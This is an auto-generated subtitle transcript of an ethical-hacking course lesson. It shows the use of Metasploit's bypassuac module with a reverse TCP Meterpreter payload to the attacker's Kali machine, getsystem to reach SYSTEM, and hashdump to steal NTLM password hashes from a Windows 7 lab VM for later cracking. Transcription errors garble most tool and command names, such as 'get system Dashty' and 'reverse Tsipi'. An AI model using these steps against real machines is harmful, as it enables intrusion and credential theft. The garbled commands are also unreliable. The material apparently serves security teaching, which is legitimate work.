1 00:00:01,020 --> 00:00:08,310 In the last lesson, we saw how to use them interpretor to to run commands on a Windows seven computer 2 00:00:08,430 --> 00:00:10,690 from Alcalay Linux box. 3 00:00:10,710 --> 00:00:16,410 It's like we've got a shell open or a command prompt open on the Windows seven box, but we're running 4 00:00:16,410 --> 00:00:19,640 it from a remote Calli Linux computer. 5 00:00:20,130 --> 00:00:26,670 What we saw that we couldn't do, though, was run administrative level commands like maybe removing 6 00:00:27,030 --> 00:00:31,430 the game, not file so that it's no longer there running cashed up. 7 00:00:31,440 --> 00:00:33,510 So we pull passwords from the computer. 8 00:00:34,200 --> 00:00:40,530 We're going to see how we can get that system level access with another exploit called privilege escalation. 9 00:00:41,100 --> 00:00:47,400 We're going to bypass the user account controls and we're going to become a system level user on a Windows 10 00:00:47,400 --> 00:00:48,420 seven box. 11 00:00:48,990 --> 00:00:51,420 So we're in this interactive session and interpreter. 12 00:00:51,420 --> 00:00:54,300 So the very first thing we need to do is put that in the background. 13 00:00:54,300 --> 00:00:56,640 We can access it again with sessions. 14 00:00:59,330 --> 00:01:05,840 So we'll background on Interpretor and we're back in regular media spotlight so we can clear the screen 15 00:01:06,470 --> 00:01:14,150 and we're still connected with that Windows seven computer so we can use a new exploit called exploit 16 00:01:15,260 --> 00:01:24,830 slash windows, slash local bypass UAC. 17 00:01:24,830 --> 00:01:26,390 That's bypass UAC. 18 00:01:26,390 --> 00:01:28,210 I just had to do BWP tab. 19 00:01:28,610 --> 00:01:33,920 We're going to bypass those user account controls on this Windows seven computer and we're going to 20 00:01:33,920 --> 00:01:35,060 become a root user. 21 00:01:35,070 --> 00:01:39,050 So we're going to root Windows seven just like what the other exploit. 22 00:01:39,050 --> 00:01:42,290 We need to show the options. 23 00:01:44,400 --> 00:01:50,490 And you can see we need a session number for this, so will our session number of the machine that we 24 00:01:50,490 --> 00:01:52,370 were just talking to, a session number one. 25 00:01:52,680 --> 00:02:00,450 So we'll say set session with all uppercase one and then we'll show options again. 26 00:02:03,380 --> 00:02:08,750 And now our session is set correctly to one, and the technique is an executable, but that's OK, we 27 00:02:08,750 --> 00:02:10,200 don't need to change anything there. 28 00:02:10,760 --> 00:02:12,860 We're going to set payload. 29 00:02:15,190 --> 00:02:26,230 Windows interpreter slash reverse Tsipi reverse underscore TCP presenter. 30 00:02:27,830 --> 00:02:34,790 So we're still using this same interpreter payload to send things back and forth, we'll show the options 31 00:02:34,790 --> 00:02:35,240 again. 32 00:02:36,920 --> 00:02:42,590 We want to set the local host or the host option to our Linux computer. 33 00:02:43,700 --> 00:02:46,160 So we will set our host. 34 00:02:49,280 --> 00:02:55,580 To 10 dot oh, dot three, dot five for my computer, make sure you're using whatever your I-F config 35 00:02:55,910 --> 00:02:59,350 said from your other window Sitel host. 36 00:02:59,390 --> 00:03:03,140 Now we'll do a show options again, and we've got the lowest in there correctly. 37 00:03:03,710 --> 00:03:05,930 Now we're in the bypass UAC. 38 00:03:06,450 --> 00:03:10,940 So let's run that exploit by typing, exploit and hitting enter. 39 00:03:14,220 --> 00:03:17,370 Now you will see split really going to work. 40 00:03:17,550 --> 00:03:22,290 It's got the reverse Tsipi handler that's connected, the UAC is enabled. 41 00:03:22,350 --> 00:03:25,070 Checking the label, UAC is set to default. 42 00:03:25,080 --> 00:03:26,250 It's bypassing. 43 00:03:26,490 --> 00:03:29,910 And now we're part of the administrators group continuing. 44 00:03:30,240 --> 00:03:35,130 You can see it's uploaded, the agent, the file system, the interpreter, stagers going. 45 00:03:35,130 --> 00:03:39,210 So we have a brand new session session, too. 46 00:03:39,210 --> 00:03:43,110 And I'm already interpreter, so I don't have to use the sections command here. 47 00:03:43,470 --> 00:03:50,640 I can just say get UID and it shows I'm still a user. 48 00:03:50,670 --> 00:04:00,210 Well, what's this command get system Dashty and one get system Dashty. 49 00:04:00,240 --> 00:04:05,160 One use technique one which happens to be pipe named pipe impersonation. 50 00:04:05,520 --> 00:04:08,700 Just a way of getting administrative level privileges. 51 00:04:08,970 --> 00:04:14,250 So I'm no longer the get uid i.e. 827 IEEE user. 52 00:04:14,490 --> 00:04:21,930 If I hit the up arrow a couple of times and get the user ID again, I am now in authority system. 53 00:04:22,200 --> 00:04:28,110 I am the Windows seven enty operating system system level user. 54 00:04:28,260 --> 00:04:32,580 So I am the administrator route on this Windows seven computer. 55 00:04:33,090 --> 00:04:43,530 Now I can run PWP and Seongmin Windows System 32 so I can KDDI all the way to route cDNA users. 56 00:04:46,400 --> 00:04:51,660 Unless you can see I've got a few users, they have been almost KDDI and IHI user. 57 00:04:57,790 --> 00:05:01,270 CD into their desktop downloads folder. 58 00:05:04,410 --> 00:05:10,980 I can see that game like I won't be able to remove game daddy right now, and why is that? 59 00:05:11,100 --> 00:05:17,040 Well, because game Dionysiac is what's running in memory on that Windows seven computer and connecting 60 00:05:17,040 --> 00:05:19,170 me into that box. 61 00:05:19,350 --> 00:05:23,640 But now I am an administrative user so I can do some other useful things. 62 00:05:24,180 --> 00:05:33,540 For example, I can dump all the password hashes so I can run past dump and hash dump has shown me some 63 00:05:33,540 --> 00:05:35,330 pretty interesting things already. 64 00:05:35,340 --> 00:05:38,550 Do you see this IHI user is password? 65 00:05:38,670 --> 00:05:45,030 It's already tell me because we had a password hint in this Windows seven computer that we downloaded 66 00:05:45,030 --> 00:05:50,190 as a VM that gave me the hint that the password for a user is password. 67 00:05:50,470 --> 00:05:54,180 Well, it's usually not that easy, but do you see these hash values down here? 68 00:05:54,180 --> 00:05:57,660 These are intelligent hashes for the administrator. 69 00:05:57,660 --> 00:06:03,600 Password looks like it's the same as the guest password, which is probably blank on this VM and then 70 00:06:03,600 --> 00:06:04,410 the user. 71 00:06:04,410 --> 00:06:08,030 This is the hash that would give me password. 72 00:06:08,610 --> 00:06:14,010 Well, it turns out we can use this hash if we just copy these values. 73 00:06:15,040 --> 00:06:19,780 And save them into a file or copy them, and now that we've got our guest editions, we can copy and 74 00:06:19,780 --> 00:06:27,130 paste back over into our desktop PC, our host machine, but we'll be able to find out what that password 75 00:06:27,130 --> 00:06:34,160 is just by running a couple of different password attacks against this intel hash. 76 00:06:34,630 --> 00:06:39,700 So even though this is a one way hash or an encoded version of the password, I'll be able to recover 77 00:06:39,700 --> 00:06:40,660 it and get it back. 78 00:06:41,170 --> 00:06:45,520 Just for good measure, let's move back over to the Windows seven computer, add a couple more user 79 00:06:45,520 --> 00:06:50,290 accounts and then come back and run this past password hash dump again. 80 00:06:50,770 --> 00:07:00,040 So I'm in my Windows seven VM and I'm going to come to the start menu control panel user accounts and 81 00:07:00,040 --> 00:07:02,520 I'm going to add or remove user accounts. 82 00:07:02,950 --> 00:07:04,540 Let's create a new account. 83 00:07:05,230 --> 00:07:06,550 Let's create a new account. 84 00:07:06,550 --> 00:07:07,600 Name Fred. 85 00:07:09,940 --> 00:07:13,900 And let's make Fred's password create a password. 86 00:07:15,410 --> 00:07:19,040 Wilma WGL A. 87 00:07:20,180 --> 00:07:21,530 Create that password. 88 00:07:23,610 --> 00:07:26,280 Manage another account, create a new account, Wilma. 89 00:07:28,870 --> 00:07:31,810 And let's make her password, Fred. 90 00:07:35,700 --> 00:07:37,020 Create that password. 91 00:07:38,410 --> 00:07:40,670 Now we have two more users, Fred and Wilma. 92 00:07:40,720 --> 00:07:47,080 Let's go back over to our our Kelly Linux box and see if we can dump those ashes just to shore up Arrow 93 00:07:47,080 --> 00:07:48,190 again, run hashed up. 94 00:07:48,190 --> 00:07:54,820 And because we're still connected to that, Windows seven computer hash dump will pull us the fresh 95 00:07:54,820 --> 00:08:00,430 up to the minute list of all the usernames and their hashed passwords. 96 00:08:02,600 --> 00:08:08,450 So you can see my administrator and guest accounts, my IHI user, Fred and Wilma, and notice they 97 00:08:08,450 --> 00:08:13,330 have different hash values out here because those are three different passwords. 98 00:08:14,060 --> 00:08:16,730 We'll see how to crack those in the password section. 99 00:08:17,030 --> 00:08:18,530 So I'm going to copy this. 100 00:08:19,370 --> 00:08:22,670 And for now, I'm just going to store it and leaf pad by pasting it. 101 00:08:23,750 --> 00:08:25,760 And go to file save as. 102 00:08:28,690 --> 00:08:35,350 And say this to my route documents as when seven. 103 00:08:36,710 --> 00:08:45,890 Hashes dot text, he will use these password hashes and the password cracking section, but for right 104 00:08:45,890 --> 00:08:51,110 now we can see that we can do administrative level things, even things that are hard to do on the Windows 105 00:08:51,110 --> 00:08:52,010 box directly. 106 00:08:52,010 --> 00:08:57,110 I can do easily through this interpreter session from Calli Linux. 107 00:08:57,770 --> 00:09:03,020 We'll do a little review and then we'll see how to use those passwords and how to crack those hashes 108 00:09:03,110 --> 00:09:04,340 in an upcoming section.